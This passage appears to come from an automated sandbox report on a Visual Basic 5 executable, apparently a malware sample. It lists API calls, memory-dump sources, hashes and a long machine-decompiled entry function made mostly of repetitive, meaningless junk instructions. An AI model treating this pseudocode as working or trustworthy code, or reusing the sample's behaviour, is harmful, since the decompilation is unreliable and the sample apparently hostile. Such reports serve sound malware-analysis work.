                              • Instruction ID: 8373eb978d944ea9264a1512d9571c8dc482ad0587d8bba55c3773d022d30a96
                              • Opcode Fuzzy Hash: cc634e36ab2d1ca5b999e065f365d04f10b2cd118a50263bd855a6a7a8ecea54
                              • Instruction Fuzzy Hash: 372168B5840258EFCB009F94DD89EEEBBB8FF54B00F04411AFA45B76A4D7B81548CB68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000), ref: 02BC35CA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID: W.E
                              • API String ID: 560597551-3845452836
                              • Opcode ID: fbfbc2507091aed7754518020be11994a5458c21c1e3b08758030e76db520434
                              • Instruction ID: 9bc5b1f270e5ba3fb1144cd03f4f0b954be60b18c3ede7469974485720ac59c1
                              • Opcode Fuzzy Hash: fbfbc2507091aed7754518020be11994a5458c21c1e3b08758030e76db520434
                              • Instruction Fuzzy Hash: DBA105391002C6EACB229FADC9193587762EF03B5CFB451C9D4949B4A3D335A492CBC3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID: _&
                              • API String ID: 1029625771-3206091340
                              • Opcode ID: e095beb9159cd8df26ad3524fbc8d198d32510da33e3cc9e26c433499bbe5afc
                              • Instruction ID: 19fea18b28b1a563ccec71e7f94c22839f9eeee2e58d171a311629b7a02a5c80
                              • Opcode Fuzzy Hash: e095beb9159cd8df26ad3524fbc8d198d32510da33e3cc9e26c433499bbe5afc
                              • Instruction Fuzzy Hash: 1D41B1791047CAEAC717AFAAD505218B762EF5374CB38A0C9D16047867D332D666CBC3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 24%
                              			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, signed int __edi, intOrPtr* __esi) {
                              				signed int _t30;
                              				void* _t32;
                              				signed int _t33;
                              				signed int _t34;
                              				signed char _t36;
                              				signed int _t41;
                              				signed int _t49;
                              				intOrPtr* _t50;
                              				intOrPtr* _t52;
                              				void* _t54;
                              				void* _t55;
                              				void* _t56;
                              				void* _t57;
                              				signed int _t61;
                              				signed int _t64;
                              				void* _t71;
                              				void* _t74;
                              				signed int _t75;
                              				intOrPtr _t82;
                              				void* _t85;
                              				intOrPtr _t88;
                              
                              				_t61 = __edi;
                              				_t52 = __edx;
                              				_t50 = __ecx;
                              				_push("VB5!6&*"); // executed
                              				L004014BA(); // executed
                              				 *__eax =  *__eax + __eax;
                              				 *__eax =  *__eax + __eax;
                              				 *__eax =  *__eax + __eax;
                              				 *__eax =  *__eax ^ __eax;
                              				 *__eax =  *__eax + __eax;
                              				_t30 = __eax + 1;
                              				 *_t30 =  *_t30 + _t30;
                              				 *_t30 =  *_t30 + _t30;
                              				 *_t30 =  *_t30 + _t30;
                              				 *((intOrPtr*)(_t30 + 0x2a)) =  *((intOrPtr*)(_t30 + 0x2a)) + __ecx;
                              				goto 0x2a19a382;
                              				asm("wait");
                              				_pop(es);
                              				_t75 = _t30;
                              				asm("insb");
                              				_t64 = _t30;
                              				_pop(_t41);
                              				 *__esi =  *__esi + __esi;
                              				 *__esi =  *__esi + __esi;
                              				 *__esi =  *__esi + __esi;
                              				 *__esi =  *__esi + __esi;
                              				 *__esi =  *__esi + __esi;
                              				_t32 = __esi - 1;
                              				 *_t64 =  *_t64 + _t32;
                              				_t33 = _t32 + 1;
                              				 *__ecx =  *__ecx + 0x50;
                              				if( *__ecx >= 0) {
                              					_push(0x65);
                              					asm("arpl [ebp+esi], si");
                              					 *_t33 =  *_t33 + _t33;
                              					 *((intOrPtr*)(_t33 + 0x307 + _t33 * 4)) =  *((intOrPtr*)(_t33 + 0x307 + _t33 * 4)) + __edx;
                              					 *_t33 =  *_t33 + _t33;
                              					L2:
                              					asm("int3");
                              					 *_t33 =  *_t33 ^ _t33;
                              					asm("adc al, 0xa1");
                              					asm("loop 0x27");
                              					_t49 = _t41 + _t41 + 1;
                              					asm("rcr ebp, 0x87");
                              					_t71 = _t71 + 1;
                              					asm("popfd");
                              					_pop(es);
                              					asm("repe into");
                              					asm("out 0xc3, al");
                              					_t75 =  *(_t64 + 0x42a39078) * 0x47;
                              					asm("repne push ss");
                              					asm("sbb [esi], bl");
                              					_t36 = _t52 -  *((intOrPtr*)(_t64 - 0x22)) & _t49;
                              					_t52 = 0x3a;
                              					_t61 = _t61 - 1;
                              					asm("lodsd");
                              					_t41 = _t49 ^  *(_t50 - 0x48ee309a);
                              					_t34 = _t36;
                              					asm("stosb");
                              					L3:
                              					 *((intOrPtr*)(_t34 - 0x2d)) =  *((intOrPtr*)(_t34 - 0x2d)) + _t34;
                              					_t33 = _t41;
                              					_t41 = _t34;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					 *_t33 =  *_t33 + _t33;
                              					if( *_t33 < 0) {
                              						goto L2;
                              					}
                              					 *_t33 =  *_t33 + _t33;
                              				}
                              				_t34 =  *0xe000000;
                              				 *((intOrPtr*)(_t34 + 0x4f)) =  *((intOrPtr*)(_t34 + 0x4f)) + _t50;
                              				_push(_t64);
                              				_push(_t52);
                              				_t61 = _t61 + 1;
                              				_t74 = _t71 + 3;
                              				_t75 = _t75 + 1 - 1;
                              				_push(_t34);
                              				_push(_t74);
                              				_t64 = _t64 - 1;
                              				_push(_t41);
                              				 *0x50000801 =  *0x50000801 + _t50;
                              				_t82 =  *0x50000801;
                              				asm("outsd");
                              				asm("insb");
                              				asm("gs outsb");
                              				if(_t82 < 0) {
                              					if (_t82 == 0) goto L7;
                              					asm("sbb [ecx], eax");
                              					 *_t52 =  *_t52 + _t34;
                              					 *(_t64 - 0x65) =  *(_t64 - 0x65) & _t61;
                              					 *_t34 =  *_t34 + _t34;
                              					asm("insb");
                              					if ( *_t34 == 0) goto L8;
                              					 *(_t64 - 0x65) =  *(_t64 - 0x65) + _t52;
                              					 *_t34 =  *_t34 + _t34;
                              					_t52 = _t52 + 1;
                              					_t71 = _t74 - 1;
                              					if(_t71 <= 0) {
                              						goto L3;
                              					} else {
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *[ss:eax] =  *[ss:eax] + _t34;
                              						 *_t34 =  *_t34 + _t50;
                              						 *_t34 =  *_t34 + _t34;
                              						 *((intOrPtr*)(_t34 - 0x76000000)) =  *((intOrPtr*)(_t34 - 0x76000000)) + _t52;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t50 =  *_t50 + _t34;
                              						 *_t34 =  *_t34 + _t52;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *((intOrPtr*)(_t34 - 0x65)) =  *((intOrPtr*)(_t34 - 0x65)) + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						asm("rol dword [eax], 0x0");
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						 *_t34 =  *_t34 + _t34;
                              						_t85 =  *_t34;
                              					}
                              				}
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				 *_t34 =  *_t34 + _t34;
                              				0xeba5429b();
                              				asm("fxam");
                              				asm("fcomp st0, st7");
                              				if(_t85 < 0) {
                              					asm("wait");
                              				}
                              				if(_t85 < 0) {
                              					asm("wait");
                              				}
                              				_t54 = 0xbceeb6;
                              				if(_t85 < 0) {
                              					asm("wait");
                              				}
                              				_t55 = _t54 + 0x48ee20;
                              				if(_t55 < 0) {
                              					asm("wait");
                              					asm("fnop");
                              					asm("fcom st0, st2");
                              				}
                              				_t56 = _t55 - 0x7775f7;
                              				asm("fdivp st1, st0");
                              				asm("punpckhdq mm6, mm5");
                              				_t57 = _t56 - 0x610bb6;
                              				if (_t57 + 0x12b4df >= 0) goto L30;
                              				_t27 = _t41 - 0x2164ca8f;
                              				 *_t27 =  *((intOrPtr*)(_t41 - 0x2164ca8f)) + _t41;
                              				_t88 =  *_t27;
                              			}
                              0x004015e5
                              0x004015e7
                              0x004015e9
                              0x004015eb
                              0x004015ed
                              0x004015ef
                              0x004015f1
                              0x004015f3
                              0x004015f5
                              0x004015f7
                              0x004015f9
                              0x004015fb
                              0x004015fd
                              0x004015ff
                              0x004015ff
                              0x004015ff
                              0x004015a4
                              0x00401601
                              0x00401603
                              0x00401605
                              0x00401607
                              0x00401609
                              0x0040160b
                              0x0040160d
                              0x0040160f
                              0x00401611
                              0x00401613
                              0x00401615
                              0x00401617
                              0x00401619
                              0x0040161b
                              0x0040161d
                              0x0040161f
                              0x00401621
                              0x00401623
                              0x00401625
                              0x00401627
                              0x00401629
                              0x0040162b
                              0x0040162d
                              0x0040162f
                              0x00401631
                              0x00401633
                              0x00401635
                              0x00401637
                              0x00401639
                              0x0040163b
                              0x0040163d
                              0x0040163f
                              0x00401641
                              0x00401643
                              0x00401645
                              0x00401647
                              0x00401649
                              0x0040164b
                              0x0040164d
                              0x0040164f
                              0x00401651
                              0x00401653
                              0x00401655
                              0x00401657
                              0x00401659
                              0x0040165b
                              0x0040165d
                              0x0040165f
                              0x00401661
                              0x00401663
                              0x00401665
                              0x00401667
                              0x00401669
                              0x0040166b
                              0x0040166d
                              0x0040166f
                              0x00401671
                              0x00401673
                              0x00401675
                              0x00401677
                              0x00401679
                              0x0040167b
                              0x0040167d
                              0x0040167f
                              0x00401681
                              0x00401683
                              0x00401685
                              0x00401687
                              0x00401689
                              0x0040168b
                              0x0040168d
                              0x0040168f
                              0x00401691
                              0x00401693
                              0x00401695
                              0x00401697
                              0x00401699
                              0x0040169b
                              0x0040169d
                              0x0040169f
                              0x004016a1
                              0x004016a3
                              0x004016a5
                              0x004016a7
                              0x004016a9
                              0x004016ab
                              0x004016ad
                              0x004016af
                              0x004016b1
                              0x004016b3
                              0x004016b5
                              0x004016b7
                              0x004016b9
                              0x004016bb
                              0x004016bd
                              0x004016bf
                              0x004016c1
                              0x004016c3
                              0x004016c5
                              0x004016c7
                              0x004016c9
                              0x004016cb
                              0x004016cd
                              0x004016cf
                              0x004016d1
                              0x004016d3
                              0x004016d5
                              0x004016d7
                              0x004016d9
                              0x004016db
                              0x004016dd
                              0x004016df
                              0x004016e1
                              0x004016e3
                              0x004016e5
                              0x004016e7
                              0x004016e9
                              0x004016eb
                              0x004016ed
                              0x004016ef
                              0x004016f1
                              0x004016f3
                              0x004016f5
                              0x004016f7
                              0x004016f9
                              0x004016fb
                              0x004016fd
                              0x004016ff
                              0x00401701
                              0x00401703
                              0x00401705
                              0x00401707
                              0x00401709
                              0x0040170b
                              0x0040170d
                              0x0040170f
                              0x00401711
                              0x00401713
                              0x00401715
                              0x00401717
                              0x00401719
                              0x0040171b
                              0x0040171d
                              0x0040171f
                              0x00401721
                              0x00401723
                              0x00401725
                              0x00401727
                              0x00401729
                              0x0040172b
                              0x0040172d
                              0x0040172f
                              0x00401731
                              0x00401733
                              0x00401735
                              0x00401737
                              0x00401739
                              0x0040173b
                              0x0040173d
                              0x0040173f
                              0x00401741
                              0x00401743
                              0x00401745
                              0x00401747
                              0x00401749
                              0x0040174b
                              0x0040174d
                              0x0040174f
                              0x00401751
                              0x00401753
                              0x00401755
                              0x00401757
                              0x00401759
                              0x0040175b
                              0x0040175d
                              0x0040175f
                              0x00401761
                              0x00401763
                              0x00401765
                              0x00401767
                              0x00401769
                              0x0040176b
                              0x0040176d
                              0x0040176f
                              0x00401771
                              0x00401773
                              0x00401775
                              0x00401777
                              0x00401779
                              0x0040177b
                              0x0040177d
                              0x0040177f
                              0x00401781
                              0x00401783
                              0x00401785
                              0x00401787
                              0x00401789
                              0x0040178b
                              0x0040178d
                              0x0040178f
                              0x00401791
                              0x00401793
                              0x00401795
                              0x00401797
                              0x00401799
                              0x0040179b
                              0x0040179d
                              0x0040179f
                              0x004017a1
                              0x004017a3
                              0x004017a5
                              0x004017a7
                              0x004017a9
                              0x004017ab
                              0x004017ad
                              0x004017af
                              0x004017c0
                              0x004017c2
                              0x004017e9
                              0x004017eb
                              0x004017eb
                              0x004017ec
                              0x004017ee
                              0x004017ee
                              0x004017ef
                              0x00401829
                              0x0040182b
                              0x0040182b
                              0x0040182c
                              0x00401832
                              0x00401834
                              0x00401835
                              0x00401837
                              0x00401837
                              0x00401863
                              0x0040186d
                              0x0040186f
                              0x0040189f
                              0x004018df
                              0x004018e0
                              0x004018e0
                              0x004018e0

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: #100
                              • String ID: VB5!6&*
                              • API String ID: 1341478452-3593831657
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 02BC6443: LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000), ref: 02BC35CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoadProcessTerminate
                              • String ID:
                              • API String ID: 3349790660-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LdrInitializeThunk.NTDLL(?,?,?,02BC1656,00000000,00000000,00000000,00000000,00000105,0000034D,?,02BC3E1B,?,?,00000004), ref: 02BC4E03
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000), ref: 02BC35CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

